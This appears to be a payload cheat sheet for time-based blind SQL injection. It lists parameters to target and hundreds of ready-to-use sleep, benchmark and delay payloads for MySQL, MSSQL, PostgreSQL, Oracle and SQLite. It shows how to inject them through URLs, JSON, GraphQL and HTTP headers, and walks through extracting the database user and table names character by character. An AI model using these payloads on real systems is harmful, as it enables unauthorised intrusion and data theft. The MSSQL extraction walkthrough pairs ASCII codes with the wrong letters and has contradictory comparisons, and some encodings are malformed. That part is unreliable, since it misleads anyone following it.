Time-based Blind SQL Injection

Time-based SQL Injection
Blind SQL Injection

Description:
Time-based blind SQL injection is an inferential SQL injection technique that relies on a SQL query which makes the database pause for a set period of time (in seconds) before responding. The attacker can tell whether the query result is TRUE or FALSE from the response time: the HTTP response comes back either delayed or immediately, depending on the outcome. No data from the database is returned directly; the attacker only learns whether the injected condition evaluated to true or false.

Where you will hunt for Blind SQL Injection:

Time Based Method (GET,POST,PUT)

Apply on:
Search, full name, surname, number, any kind of date, Email, Password (register, login, reset password), Any kind of Product, menu, keyword, payment, Cookie, User-agent, Referrer, X-Forwarded-For

Which parameters to try:

id
cid
pid
page
search
username
name
register
first name
email
pass
password
dir
category
class
register
file
news
item
menu
lang
name
ref
title
time
view
topic
thread
type
date
form
join
main
nav
region
select
report
role
update
query
user
sort
where
params
process
row
table
from
results
sleep
fetch
order
keyword
column
field
delete
string
number
filter

MySQL Blind (Time Based) SQL Injection Query:

0’XOR(if(now()=sysdate(),sleep(5),0))XOR’Z
0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
if(now()=sysdate(),sleep(5),0)
‘XOR(if(now()=sysdate(),sleep(5),0))XOR’
‘XOR(if(now()=sysdate(),sleep(5*1),0))OR’
if(now()=sysdate(),sleep(5),0)/”XOR(if(now()=sysdate(),sleep(5),0))OR”/
if(now()=sysdate(),sleep(5),0)/*’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0))OR”*/
if(now()=sysdate(),sleep(5),0)/’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0) and 5=5)”/
SLEEP(5)/*’ or SLEEP(5) or ‘” or SLEEP(5) or “*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
‘%2b(select*from(select(sleep(5)))a)%2b’
(select*from(select(sleep(5)))a)
1’%2b(select*from(select(sleep(5)))a)%2b’
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)–
‘+(select*from(select(sleep(5)))a)+’
(select(0)from(select(sleep(5)))v)%2f’+(select(0)from(select(sleep(5)))v)+'”
(select(0)from(select(sleep(5)))v)%2f*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*%2f
(select(0)from(select(sleep(5)))v)/*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*/

AND BLIND Query:

1 and sleep 5–
1 and sleep 5
1 and sleep(5)–
1 and sleep(5)
‘ and sleep 5–
‘ and sleep 5
‘ and sleep 5 and ‘1’=’1
‘ and sleep(5) and ‘1’=’1
‘ and sleep(5)–
‘ and sleep(5)
‘ AnD SLEEP(5) ANd ‘1
and sleep 5–
and sleep 5
and sleep(5)–
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)–
AnD SLEEP(5)#
and sleep 5–
and sleep 5
and sleep(5)–
and sleep(5)
and SELECT SLEEP(5); #
‘ AND SLEEP(5)#
” AND SLEEP(5)#
‘) AND SLEEP(5)#

OR BLIND Query:

or sleep 5–
or sleep 5
or sleep(5)–
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)–
or SLEEP(5)=”
or SLEEP(5)=’
or sleep 5–
or sleep 5
or sleep(5)–
or sleep(5)
or SELECT SLEEP(5); #
‘ OR SLEEP(5)#
” OR SLEEP(5)#
‘) OR SLEEP(5)#

You can replace AND / OR:

1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337’=’1337
‘) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (‘PBiy’=’PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
‘) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
” AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
‘) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (‘1337’=’1337
‘)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((‘1337’=’1337
‘))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((‘1337’=’1337
‘ AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337’=’1337
‘) AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND (‘1337’=’1337
‘)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((‘1337’ LIKE ‘1337
‘))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((‘1337’ LIKE ‘1337
%’ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337%’=’1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ‘1337’ LIKE ‘1337
“) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (“1337″=”1337
“)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((“1337″=”1337
“))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((“1337″=”1337
” AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND “1337”=”1337
“) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (“1337” LIKE “1337
“)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((“1337” LIKE “1337
“))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((“1337” LIKE “1337
” AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND “1337” LIKE “1337
‘ AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ‘1337’=’1337
‘) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
“) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337

RLIKE BLIND Query:

RLIKE SLEEP(5)–
‘ RLIKE SLEEP(5)–
‘ RLIKE SLEEP(5)– 1337
” RLIKE SLEEP(5)– 1337
‘) RLIKE SLEEP(5)– 1337
‘) RLIKE SLEEP(5) AND (‘1337’=’1337
‘)) RLIKE SLEEP(5) AND ((‘1337’=’1337
‘))) RLIKE SLEEP(5) AND (((‘1337’=’1337
) RLIKE SLEEP(5)– 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)– 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)– 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)– 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)– 1337
` WHERE 1337=1337 RLIKE SLEEP(5)– 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
‘ RLIKE SLEEP(5) AND ‘1337’=’1337
‘) RLIKE SLEEP(5) AND (‘1337’ LIKE ‘1337
‘)) RLIKE SLEEP(5) AND ((‘1337’ LIKE ‘1337
‘))) RLIKE SLEEP(5) AND (((‘1337’ LIKE ‘1337
%’ RLIKE SLEEP(5) AND ‘1337%’=’1337
‘ RLIKE SLEEP(5) AND ‘1337’ LIKE ‘1337
“) RLIKE SLEEP(5) AND (“1337″=”1337
“)) RLIKE SLEEP(5) AND ((“1337″=”1337
“))) RLIKE SLEEP(5) AND (((“1337″=”1337
” RLIKE SLEEP(5) AND “1337”=”1337
“) RLIKE SLEEP(5) AND (“1337” LIKE “1337
“)) RLIKE SLEEP(5) AND ((“1337” LIKE “1337
“))) RLIKE SLEEP(5) AND (((“1337” LIKE “1337
” RLIKE SLEEP(5) AND “1337” LIKE “1337
‘ RLIKE SLEEP(5) OR ‘1337’=’1337
‘) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
“) WHERE 1337=1337 RLIKE SLEEP(5)– 1337
‘ WHERE 1337=1337 RLIKE SLEEP(5)– 1337
” WHERE 1337=1337 RLIKE SLEEP(5)– 1337

ELT Blind SQL Injection Query:

‘ AND ELT(1337=1337,SLEEP(5))–
‘ AND ELT(1337=1337,SLEEP(5))– 1337
” AND ELT(1337=1337,SLEEP(5))– 1337
‘) AND ELT(1337=1337,SLEEP(5))– 1337
‘) AND ELT(1337=1337,SLEEP(5)) AND (‘1337’=’1337
‘)) AND ELT(1337=1337,SLEEP(5)) AND ((‘1337’=’1337
‘))) AND ELT(1337=1337,SLEEP(5)) AND (((‘1337’=’1337
‘ AND ELT(1337=1337,SLEEP(5)) AND ‘1337’=’1337
‘) AND ELT(1337=1337,SLEEP(5)) AND (‘1337’ LIKE ‘1337
‘)) AND ELT(1337=1337,SLEEP(5)) AND ((‘1337’ LIKE ‘1337
‘))) AND ELT(1337=1337,SLEEP(5)) AND (((‘1337’ LIKE ‘1337
) AND ELT(1337=1337,SLEEP(5))– 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))– 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%’ AND ELT(1337=1337,SLEEP(5)) AND ‘1337%’=’1337
‘ AND ELT(1337=1337,SLEEP(5)) AND ‘1337’ LIKE ‘1337
“) AND ELT(1337=1337,SLEEP(5)) AND (“1337″=”1337
“)) AND ELT(1337=1337,SLEEP(5)) AND ((“1337″=”1337
“))) AND ELT(1337=1337,SLEEP(5)) AND (((“1337″=”1337
” AND ELT(1337=1337,SLEEP(5)) AND “1337”=”1337
“) AND ELT(1337=1337,SLEEP(5)) AND (“1337” LIKE “1337
“)) AND ELT(1337=1337,SLEEP(5)) AND ((“1337” LIKE “1337
“))) AND ELT(1337=1337,SLEEP(5)) AND (((“1337” LIKE “1337
” AND ELT(1337=1337,SLEEP(5)) AND “1337” LIKE “1337
‘ AND ELT(1337=1337,SLEEP(5)) OR ‘1337’=’FMTE
‘) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
“) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
‘ WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
” WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
‘||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||’
‘||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||’
‘+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+’
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
‘)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
“)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
‘) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337
“) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))– 1337

BENCHMARK Query:

‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341))–
‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341))– 1337
” AND 1337=BENCHMARK(5000000,MD5(0x774c5341))– 1337
‘) AND =BENCHMARK(5000000,MD5(0x774c5341))–
‘) AND 1337=BENCHMARK(5000000,MD5(0x774c5341))– 1337
‘) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (‘1337’=’1337
‘)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((‘1337’=’1337
‘))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((‘1337’=’1337
‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ‘1337’=’1337
‘) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (‘1337’ LIKE ‘1337
‘)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((‘1337’ LIKE ‘1337
‘))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((‘1337’ LIKE ‘1337
%’ AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ‘1337%’=’1337
‘ AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ‘1337’ LIKE ‘1337
“) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (“1337″=”1337
“)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((“1337″=”1337
“))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((“1337″=”1337
” AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND “1337”=”1337
“) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (“1337” LIKE “1337
“)) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((“1337” LIKE “1337
“))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (((“1337” LIKE “1337
” AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND “1337” LIKE “1337
‘ AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND ‘1337’=’1337

Microsoft SQL Server (Time Based) Blind SQL Injection Query:

;waitfor delay ‘0:0:5’–
‘;WAITFOR DELAY ‘0:0:5’–
);waitfor delay ‘0:0:5’–
‘;waitfor delay ‘0:0:5’–
“;waitfor delay ‘0:0:5’–
‘);waitfor delay ‘0:0:5’–
“);waitfor delay ‘0:0:5’–
));waitfor delay ‘0:0:5’–
‘));waitfor delay ‘0:0:5’–
“));waitfor delay ‘0:0:5’–
“) IF (1=1) WAITFOR DELAY ‘0:0:5’–
‘;%5waitfor%5delay%5’0:0:5’%5–%5
‘ WAITFOR DELAY ‘0:0:5’–
‘ WAITFOR DELAY ‘0:0:5’
or WAITFOR DELAY ‘0:0:5’–
or WAITFOR DELAY ‘0:0:5’
and WAITFOR DELAY ‘0:0:5’–
and WAITFOR DELAY ‘0:0:5’
WAITFOR DELAY ‘0:0:5’
;WAITFOR DELAY ‘0:0:5’–
;WAITFOR DELAY ‘0:0:5’
1 WAITFOR DELAY ‘0:0:5’–
1 WAITFOR DELAY ‘0:0:5’
1 WAITFOR DELAY ‘0:0:5′– 1337
1’ WAITFOR DELAY ‘0:0:5’ AND ‘1337’=’1337
1′) WAITFOR DELAY ‘0:0:5’ AND (‘1337’=’1337
1) WAITFOR DELAY ‘0:0:5’ AND (1337=1337
‘) WAITFOR DELAY ‘0:0:5’–
” WAITFOR DELAY ‘0:0:5’–
‘)) WAITFOR DELAY ‘0:0:5’–
‘))) WAITFOR DELAY ‘0:0:5′–
%’ WAITFOR DELAY ‘0:0:5’–
“) WAITFOR DELAY ‘0:0:5’–
“)) WAITFOR DELAY ‘0:0:5’–
“))) WAITFOR DELAY ‘0:0:5’–

PostgreSQL (Time Based) Blind SQL Injection Query:

“;SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)–
1 or pg_sleep(5)–
” or pg_sleep(5)–
‘ or pg_sleep(5)–
1) or pg_sleep(5)–
“) or pg_sleep(5)–
‘) or pg_sleep(5)–
1)) or pg_sleep(5)–
“)) or pg_sleep(5)–
‘)) or pg_sleep(5)–
pg_SLEEP(5)
pg_SLEEP(5)–
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)–
or pg_SLEEP(5)#
‘ SELECT pg_sleep(5);
or SELECT pg_sleep(5);
‘ SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))– 1337
1’ AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ‘1337’=’1337
1′) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (‘1337’=’1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337

Oracle Blind (Time Based) SQL Injection Query:

1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)– 1337
‘ AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ‘1337’=’1337
‘) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (‘1337’=’1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337

Generic Time Based SQL Injection Query:

sleep(5)#
(sleep 5)–
(sleep 5)
(sleep(5))–
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)–
SLEEP(5)=”
SLEEP(5)=’
“;sleep 5–
“;sleep 5
“;sleep(5)–
“;sleep(5)
“;SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + ‘
&&SLEEP(5)
&&SLEEP(5)–
&&SLEEP(5)#
;sleep 5–
;sleep 5
;sleep(5)–
;sleep(5)
;SELECT SLEEP(5); #
‘&&SLEEP(5)&&’1
‘ SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))–
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))–
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)–
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE(‘ABCDEFG’,UPPER(HEX(RANDOMBLOB(1000000000/2))))

If the response is delayed by about 5 to 7 seconds (repeat the request a few times to rule out ordinary network latency), the parameter is vulnerable.

Identification and Exploitation:

1. =payload
Example:
=0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
=(select(0)from(select(sleep(5)))v)
[email protected]’ WAITFOR DELAY ‘0:0:5’–
[email protected]’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

2. =value payload
Example:
=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND ‘%’=’
=1’XOR(if(now()=sysdate(),sleep(5),0))OR’
=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)– 1337
=1 or sleep(5)#

MySQL Blind SQL Injection Query (Time Based):

[email protected]’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z

MSSQL Blind SQL Injection Query (Time Based):
[email protected]’ WAITFOR DELAY ‘0:0:5’–

3.

https://example.com/page/payload
https://example.com/page/value payload

Example:
https://example.com/page/if(now()=sysdate(),sleep(3),0)/”XOR(if(now()=sysdate(),sleep(3),0))OR”/
https://example.com/(select(0)from(select(sleep(5)))v)%2f’+(select(0)from(select(sleep(5)))v)+'”
https://example.com/page/1 AnD SLEEP(5)
https://example.com/page/1′ ORDER BY SLEEP(5)

4. Blind SQL Injection in JSON:

{payload}
[payload]
{value payload}

Example:

[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]
{AnD SLEEP(5)}
{1 AnD SLEEP(5)}
{1′ AnD SLEEP(5)–}
{sleep 5}
“emails”:[“AnD SLEEP(5)”]
“emails”:[“[email protected]’ OR SLEEP(5)#”]
{“options”:{“id”:[],”emails”:[“AnD SLEEP(5)”],

5. Blind SQL Injection in GraphQL:

{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}
Example:
{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name AND sleep(5)”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}

6. HTTP Header Based (Error Based, Time Based):

Referer: https://example.com/408685756payload
Cookie: _gcl_au=1.1.2127391584.1587087463payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload
or
Referer: https://example.com/408685756 payload
Cookie: _gcl_au=1.1.2127391584.1587087463 payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload
X-Forwarded-For: payload

7. Blind SQL Injection Exploitation (Manual):

MySql Time Based:
RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1-SLEEP(5)
RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).
SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())
RESULTING QUERY – TIME-BASED ATTACK TO VERIFY DATABASE VERSION.
SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = ‘5’, SLEEP(5), 0)

Time Based SQL Injection:
1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = ‘A’)#

Error Blind SQLi:

AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),’a’))– –
Ultimate Sql injection Payload:
SELECT * FROM some_table WHERE double_quotes = “IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*’XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR’|”XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR”*/”

Exploitation:
example.com/page/search?q=1 and sleep(5)–
Current user:
example.com/page/search?q=1 and if(substring(user(),1,1)=’a’,SLEEP(5),1)–
example.com/page/search?q=1 and if(substring(user(),2,1)=’a’,SLEEP(5),1)–
example.com/page/search?q=1 and if(substring(user(),3,1)=’a’,SLEEP(5),1)–

Table_Name Guessing:
example.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
example.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
example.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)=’a’,sleep(5),1)–

MSSQL Time Based:

RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).
SELECT * FROM products WHERE id=1; WAIT FOR DELAY ’00:00:5′
RESULTING QUERY (VERIFY IF USER IS SA).
SELECT * FROM products WHERE id=1; IF SYSTEM_USER=’sa’ WAIT FOR DELAY ’00:00:5′

Exploitation:
http://example.com/page.aspx?id=1; WAITFOR DELAY ’00:00:5′– (+5 seconds)
TIME-BASED Extraction of CURRENT DATABASE USER

Determine Length of USER:
http://example.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = 5 characters in length

Once the length is known, determine the CHAR value at each character position, one position at a time, like this:

http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY ’00:00:5′–
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the first character CHAR value is 97 which is an “a”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the second character CHAR value is 50 which is a “d”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY ’00:00:5’—
Result = third character CHAR value is 59 which is the letter “m”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the fourth character CHAR value is 55 which is an “i”
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY ’00:00:5′– (+5 seconds)
http://example.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY ’00:00:5′– (+5 seconds)
Result = the fifth character CHAR value is 15 which is the letter “n”
